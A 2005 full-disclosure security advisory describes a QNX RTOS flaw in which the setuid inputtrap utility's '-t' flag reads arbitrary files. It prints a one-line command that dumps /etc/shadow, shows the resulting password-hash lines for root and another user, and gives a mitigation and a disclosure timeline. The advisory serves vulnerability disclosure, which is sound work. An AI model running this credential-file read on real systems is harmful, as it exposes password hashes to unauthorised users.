[Full-disclosure] [RLSA_01-2005] QNX inputtrap arbitrary file read vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2005-08-24T00:00:00


            *** rfdslabs security advisory ***

Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005] Versions: QNX RTOS 6.3, 6.1.0 (possibly others) Vendor: http://www.qnx.com Date: Feb 22 2004

Author: Julio Cesar Fort <julio NO_SPAM rfdslabs com br>

  1. Introduction

inputtrap is a utility designed to detect and start input manager in QNX.

  1. Details

inputtrap has a '-t' flag to specify the trap file to be read. Due to impro- per permissions checking, we have administrative access to read files anywhere in the disk in addition with 'start' flag.

The following simple command will show us /etc/shadow:

$ inputtrap -t /etc/shadow start options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table

PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu vulnera- bility, back in 1999. And it was, surely, erradicated in crucial programs of most operating systems.

  1. Solution

No official solution yet. We suggest remove inputtrap suid bit or change its permissions to a trusted group of users until QNX doesn't release an official patch.

  1. Timeline

22 Feb 2005: Vulnerability detected (in a very very boring day, ill at home); 09 Jun 2005: Advisory sent to QNX; 10 Jun 2005: QNX contacted rfdslabs; 24 Aug 2005: Advisory sent to security mailing lists.

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury, Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.

www.rfdslabs.com.br - computers, sex, human mind, music and more Recife, PE, Brazil

Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/